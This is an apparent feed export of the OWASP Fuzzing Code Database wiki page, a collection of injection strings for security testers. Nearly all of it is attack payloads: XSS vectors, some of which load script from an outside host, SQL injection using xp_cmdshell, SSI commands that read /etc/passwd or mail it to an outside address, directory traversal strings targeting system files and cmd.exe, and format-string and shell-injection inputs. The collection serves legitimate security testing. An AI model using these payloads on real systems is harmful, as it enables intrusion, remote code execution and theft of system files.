&amp;lt;XML ID=&amp;quot;xss&amp;quot;&amp;gt;&amp;lt;I&amp;gt;&amp;lt;B&amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;javas&amp;lt;!-- --&amp;gt;cript:alert('XSS')&amp;quot;&amp;amp;gt;&amp;lt;/B&amp;gt;&amp;lt;/I&amp;gt;&amp;lt;/XML&amp;gt;&amp;lt;SPAN DATASRC=&amp;quot;#xss&amp;quot; DATAFLD=&amp;quot;B&amp;quot; DATAFORMATAS=&amp;quot;HTML&amp;quot;&amp;gt;&amp;lt;/SPAN&amp;gt;&lt;br /&gt;
&amp;lt;XML SRC=&amp;quot;xsstest.xml&amp;quot; ID=I&amp;gt;&amp;lt;/XML&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;&lt;br /&gt;
&amp;lt;HTML&amp;gt;&amp;lt;BODY&amp;gt;&amp;lt;?xml:namespace prefix=&amp;quot;t&amp;quot; ns=&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;gt;&amp;lt;?import namespace=&amp;quot;t&amp;quot; implementation=&amp;quot;#default#time2&amp;quot;&amp;gt;&amp;lt;t:set attributeName=&amp;quot;innerHTML&amp;quot; to=&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;amp;quot;XSS&amp;amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;gt;&amp;lt;/BODY&amp;gt;&amp;lt;/HTML&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT SRC=&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;/bin/echo '&amp;lt;SCR'&amp;quot;--&amp;gt;&amp;lt;!--#exec cmd=&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;gt;&amp;lt;/SCRIPT&amp;gt;'&amp;quot;--&amp;gt;&lt;br /&gt;
&amp;lt;? echo('&amp;lt;SCR)';echo('IPT&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/SCRIPT&amp;gt;'); ?&amp;gt;&lt;br /&gt;
&amp;lt;META HTTP-EQUIV=&amp;quot;Set-Cookie&amp;quot; Content=&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;HEAD&amp;gt;&amp;lt;META HTTP-EQUIV=&amp;quot;CONTENT-TYPE&amp;quot; CONTENT=&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;gt; &amp;lt;/HEAD&amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&lt;br /&gt;
&amp;lt;SCRIPT a=&amp;quot;&amp;gt;&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT =&amp;quot;&amp;gt;&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT a=&amp;quot;&amp;gt;&amp;quot; '' SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT &amp;quot;a='&amp;gt;'&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT a=`&amp;gt;` SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT a=&amp;quot;&amp;gt;'&amp;gt;&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT&amp;gt;document.write(&amp;quot;&amp;lt;SCRI&amp;quot;);&amp;lt;/SCRIPT&amp;gt;PT SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://66.102.7.147/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://1113982867/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;h\ntt\tp://6&amp;amp;#9;6.000146.0x7.147/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;//www.google.com/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;//google&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://google.com/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://www.google.com./&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;a href=&amp;quot;javas&amp;amp;#99;ript&amp;amp;#35;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;a href=&amp;quot;javas&amp;amp;#99;ript&amp;amp;#35;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img dynsrc=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;input type=&amp;quot;image&amp;quot; dynsrc=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;bgsound src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;amp;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;amp;{document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);};&lt;br /&gt;
&amp;lt;img src=&amp;amp;{document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);};&amp;gt;&lt;br /&gt;
&amp;lt;link rel=&amp;quot;stylesheet&amp;quot; href=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;iframe src=&amp;quot;vbscript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;mocha:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;livescript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;a href=&amp;quot;about:&amp;lt;s&amp;amp;#99;ript&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;meta http-equiv=&amp;quot;refresh&amp;quot; content=&amp;quot;0;url=javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;body onload=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;background-image: url(javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;););&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;binding: url([link to code]);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width: expression(document.write(&amp;quot;XSS-XSS-XSS&amp;quot;););&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;style type=&amp;quot;text/javascript&amp;quot;&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/style&amp;gt;&lt;br /&gt;
&amp;lt;object classid=&amp;quot;clsid:...&amp;quot; codebase=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;style&amp;gt;&amp;lt;!--&amp;lt;/style&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);//--&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;![CDATA[&amp;lt;!--]]&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);//--&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;!-- -- --&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&amp;lt;!-- -- --&amp;gt;&lt;br /&gt;
&amp;lt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;blah&amp;quot;onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;blah&amp;gt;&amp;quot; onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;xml src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;xml id=&amp;quot;X&amp;quot;&amp;gt;&amp;lt;a&amp;gt;&amp;lt;b&amp;gt;&amp;amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;amp;lt;/script&amp;gt;;&amp;lt;/b&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/xml&amp;gt;&lt;br /&gt;
&amp;lt;div datafld=&amp;quot;b&amp;quot; dataformatas=&amp;quot;html&amp;quot; datasrc=&amp;quot;#X&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;&lt;br /&gt;
&amp;lt;a href=&amp;quot;javas&amp;amp;#99;ript&amp;amp;#35;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img dynsrc=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;input type=&amp;quot;image&amp;quot; dynsrc=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;bgsound src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;amp;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;amp;{document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);};&lt;br /&gt;
&amp;lt;img src=&amp;amp;{document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);};&amp;gt;&lt;br /&gt;
&amp;lt;link rel=&amp;quot;stylesheet&amp;quot; href=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;iframe src=&amp;quot;vbscript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;mocha:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;livescript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;a href=&amp;quot;about:&amp;lt;s&amp;amp;#99;ript&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;meta http-equiv=&amp;quot;refresh&amp;quot; content=&amp;quot;0;url=javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;body onload=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;background-image: url(javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;););&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;binding: url([link to code]);&amp;quot;&amp;gt; [Mozilla]&lt;br /&gt;
&amp;lt;div style=&amp;quot;width: expression(document.write(&amp;quot;XSS-XSS-XSS&amp;quot;););&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;style type=&amp;quot;text/javascript&amp;quot;&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/style&amp;gt;&lt;br /&gt;
&amp;lt;object classid=&amp;quot;clsid:...&amp;quot; codebase=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;style&amp;gt;&amp;lt;!--&amp;lt;/style&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);//--&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;![CDATA[&amp;lt;!--]]&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);//--&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;!-- -- --&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&amp;lt;!-- -- --&amp;gt;&lt;br /&gt;
&amp;lt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;blah&amp;quot;onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;blah&amp;gt;&amp;quot; onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;xml src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;xml id=&amp;quot;X&amp;quot;&amp;gt;&amp;lt;a&amp;gt;&amp;lt;b&amp;gt;&amp;amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;amp;lt;/script&amp;gt;;&amp;lt;/b&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/xml&amp;gt;&lt;br /&gt;
&amp;lt;div datafld=&amp;quot;b&amp;quot; dataformatas=&amp;quot;html&amp;quot; datasrc=&amp;quot;#X&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;&lt;br /&gt;
[\xC0][\xBC]script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);[\xC0][\xBC]/script&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Format String Statements ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Project Contributor ====&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']]&lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']]&lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Fuzzing Code Database Project - GPC Tab}}&lt;br /&gt;
[[Category:OWASP Project|Fuzzing Code Database]]&lt;br /&gt;
[[Category:OWASP Document]]&lt;br /&gt;
[[Category:OWASP Alpha Quality Document]]&lt;br /&gt;
__NOTOC__&lt;br /&gt;
&amp;lt;headertabs/&amp;gt;&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=67373</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=67373"/>
				<updated>2009-08-07T13:31:33Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==== Main ====&lt;br /&gt;
&lt;br /&gt;
This database is a collection of several statements used in code injection software. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated.&lt;br /&gt;
We want to collect all these statements, merging the statements from several projects like [[WebScarab]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results.&lt;br /&gt;
Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Statements ====&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection Statements ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
a&amp;quot; or 1=1--&lt;br /&gt;
&amp;quot; or &amp;quot;a&amp;quot; = &amp;quot;a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SSI (Server Side Includes) Statements ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;lt;mailto:Foobar@email.de&amp;gt; &amp;lt; cat /etc/passwd&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Directory Traversal Statements ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
